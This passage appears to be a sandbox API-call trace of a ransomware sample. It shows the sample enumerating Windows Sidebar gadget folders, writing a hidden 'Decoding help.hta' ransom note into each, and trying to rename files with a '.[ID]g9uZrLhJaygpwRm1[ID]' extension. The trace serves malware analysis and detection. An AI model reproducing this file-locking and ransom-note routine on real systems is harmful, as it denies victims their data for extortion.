Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\css" [0056.586] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\css", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\css\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\css\\*.*" [0056.586] GlobalMemoryStatus (in: lpBuffer=0x28c5fd10 | out: lpBuffer=0x28c5fd10) [0056.587] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x2aa58ea0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x820 [0056.588] CloseHandle (hObject=0x820) returned 1 [0056.588] FindNextFileW (in: hFindFile=0x5a5fb0, lpFindFileData=0x28c5fd30 | out: lpFindFileData=0x28c5fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x119103a1, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x11c7e240, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x119103a1, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x86a, dwReserved0=0x0, dwReserved1=0x0, cFileName="flyout.html", cAlternateFileName="")) returned 1 [0056.588] lstrcpyW (in: lpString1=0x10f2f298, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\*.*" [0056.588] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\*.*") returned 76 [0056.588] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\Decoding help.hta" [0056.588] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\rssfeeds.gadget\\en-us\\decoding help.hta")) returned 0xffffffff [0056.588] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\rssfeeds.gadget\\en-us\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x414 [0058.231] WriteFile (in: hFile=0x414, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x28c5fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x28c5fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0058.232] CloseHandle (hObject=0x414) returned 1 [0058.232] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0058.232] lstrcmpiW (lpString1="Decoding help.hta", lpString2="flyout.html") returned -1 [0058.232] lstrlenW (lpString="flyout.html") returned 11 [0058.232] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\*.*" [0058.232] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\*.*") returned 76 [0058.233] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\", lpString2="flyout.html" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\flyout.html") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\flyout.html" [0058.233] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\flyout.html" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\flyout.html") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\flyout.html" [0058.233] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\flyout.html", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\flyout.html.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\flyout.html.[ID]g9uZrLhJaygpwRm1[ID]" [0058.233] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\flyout.html" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\rssfeeds.gadget\\en-us\\flyout.html"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\flyout.html.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\rssfeeds.gadget\\en-us\\flyout.html.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0058.233] FindNextFileW (in: hFindFile=0x5a5fb0, lpFindFileData=0x28c5fd30 | out: lpFindFileData=0x28c5fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x119103a1, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x11c7e240, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x119103a1, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x3ed, dwReserved0=0x0, dwReserved1=0x0, cFileName="gadget.xml", cAlternateFileName="")) returned 1 [0058.233] lstrcpyW (in: lpString1=0x2ab11098, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\*.*" [0058.233] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\*.*") returned 76 [0058.233] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\Decoding help.hta" [0058.233] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\rssfeeds.gadget\\en-us\\decoding help.hta")) returned 0x1 [0058.233] lstrcmpiW (lpString1="Decoding help.hta", lpString2="gadget.xml") returned -1 [0058.233] lstrlenW (lpString="gadget.xml") returned 10 [0058.233] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\*.*" [0058.233] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\*.*") returned 76 [0058.233] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\", lpString2="gadget.xml" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\gadget.xml") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\gadget.xml" [0058.233] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\gadget.xml" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\gadget.xml") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\gadget.xml" [0058.233] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\gadget.xml", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\gadget.xml.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\gadget.xml.[ID]g9uZrLhJaygpwRm1[ID]" [0058.233] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\gadget.xml" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\rssfeeds.gadget\\en-us\\gadget.xml"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\gadget.xml.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\rssfeeds.gadget\\en-us\\gadget.xml.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0058.233] FindNextFileW (in: hFindFile=0x5a5fb0, lpFindFileData=0x28c5fd30 | out: lpFindFileData=0x28c5fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eab37af, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22ad0a6d, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="js", cAlternateFileName="")) returned 1 [0058.234] lstrcmpW (lpString1=".", lpString2="js") returned -1 [0058.234] lstrcmpW (lpString1="..", lpString2="js") returned -1 [0058.234] lstrcmpiW (lpString1="windows", lpString2="js") returned 1 [0058.234] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\*.*" [0058.234] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\*.*") returned 76 [0058.234] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\", lpString2="js" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\js") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\js" [0058.234] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\js", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\js\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\js\\*.*" [0058.234] GlobalMemoryStatus (in: lpBuffer=0x28c5fd10 | out: lpBuffer=0x28c5fd10) [0058.234] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x110e39a8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x414 [0058.235] CloseHandle (hObject=0x414) returned 1 [0058.235] FindNextFileW (in: hFindFile=0x5a5fb0, lpFindFileData=0x28c5fd30 | out: lpFindFileData=0x28c5fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x119103a1, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x11c7e240, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x119103a1, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x271c, dwReserved0=0x0, dwReserved1=0x0, cFileName="RSSFeeds.html", cAlternateFileName="")) returned 1 [0058.235] lstrcpyW (in: lpString1=0x2ab11098, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\*.*" [0058.235] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\*.*") returned 76 [0058.235] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\Decoding help.hta" [0058.235] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\rssfeeds.gadget\\en-us\\decoding help.hta")) returned 0x1 [0058.235] lstrcmpiW (lpString1="Decoding help.hta", lpString2="RSSFeeds.html") returned -1 [0058.235] lstrlenW (lpString="RSSFeeds.html") returned 13 [0058.235] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\*.*" [0058.235] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\*.*") returned 76 [0058.235] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\", lpString2="RSSFeeds.html" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\RSSFeeds.html") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\RSSFeeds.html" [0058.235] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\RSSFeeds.html" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\RSSFeeds.html") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\RSSFeeds.html" [0058.235] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\RSSFeeds.html", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\RSSFeeds.html.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\RSSFeeds.html.[ID]g9uZrLhJaygpwRm1[ID]" [0058.235] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\RSSFeeds.html" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\rssfeeds.gadget\\en-us\\rssfeeds.html"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\RSSFeeds.html.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\rssfeeds.gadget\\en-us\\rssfeeds.html.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0058.236] FindNextFileW (in: hFindFile=0x5a5fb0, lpFindFileData=0x28c5fd30 | out: lpFindFileData=0x28c5fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x119103a1, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x11c7e240, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x119103a1, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xcfe, dwReserved0=0x0, dwReserved1=0x0, cFileName="settings.html", cAlternateFileName="")) returned 1 [0058.236] lstrcpyW (in: lpString1=0x2ab11098, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\*.*" [0058.236] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\*.*") returned 76 [0058.236] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\Decoding help.hta" [0058.236] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\rssfeeds.gadget\\en-us\\decoding help.hta")) returned 0x1 [0058.236] lstrcmpiW (lpString1="Decoding help.hta", lpString2="settings.html") returned -1 [0058.236] lstrlenW (lpString="settings.html") returned 13 [0058.236] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\*.*" [0058.237] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\*.*") returned 76 [0058.237] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\", lpString2="settings.html" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\settings.html") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\settings.html" [0058.237] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\settings.html" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\settings.html") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\settings.html" [0058.237] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\settings.html", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\settings.html.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\settings.html.[ID]g9uZrLhJaygpwRm1[ID]" [0058.237] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\settings.html" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\rssfeeds.gadget\\en-us\\settings.html"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\settings.html.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\rssfeeds.gadget\\en-us\\settings.html.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0058.237] FindNextFileW (in: hFindFile=0x5a5fb0, lpFindFileData=0x28c5fd30 | out: lpFindFileData=0x28c5fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x119103a1, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x11c7e240, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x119103a1, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xcfe, dwReserved0=0x0, dwReserved1=0x0, cFileName="settings.html", cAlternateFileName="")) returned 0 [0058.237] FindClose (in: hFindFile=0x5a5fb0 | out: hFindFile=0x5a5fb0) returned 1 Thread: id = 860 os_tid = 0xaac [0054.688] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\*.*", lpFindFileData=0x28d9fd30 | out: lpFindFileData=0x28d9fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea8d4f6, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22a844fb, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea8d4f6, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x671270 [0054.689] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0054.689] FindNextFileW (in: hFindFile=0x671270, lpFindFileData=0x28d9fd30 | out: lpFindFileData=0x28d9fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea8d4f6, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22a844fb, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea8d4f6, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0054.689] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0054.689] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0054.689] FindNextFileW (in: hFindFile=0x671270, lpFindFileData=0x28d9fd30 | out: lpFindFileData=0x28d9fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea8d4f6, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22a844fb, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea8d4f6, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="css", cAlternateFileName="")) returned 1 [0054.689] lstrcmpW (lpString1=".", lpString2="css") returned -1 [0054.689] lstrcmpW (lpString1="..", lpString2="css") returned -1 [0054.689] lstrcmpiW (lpString1="windows", lpString2="css") returned 1 [0054.689] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\*.*" [0054.689] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\*.*") returned 81 [0054.689] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\", lpString2="css" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\css") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\css" [0054.689] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\css", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\css\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\css\\*.*" [0054.689] GlobalMemoryStatus (in: lpBuffer=0x28d9fd10 | out: lpBuffer=0x28d9fd10) [0054.689] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x25247d08, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x74c [0054.691] CloseHandle (hObject=0x74c) returned 1 [0054.691] FindNextFileW (in: hFindFile=0x671270, lpFindFileData=0x28d9fd30 | out: lpFindFileData=0x28d9fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x119103a1, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x11c7e240, 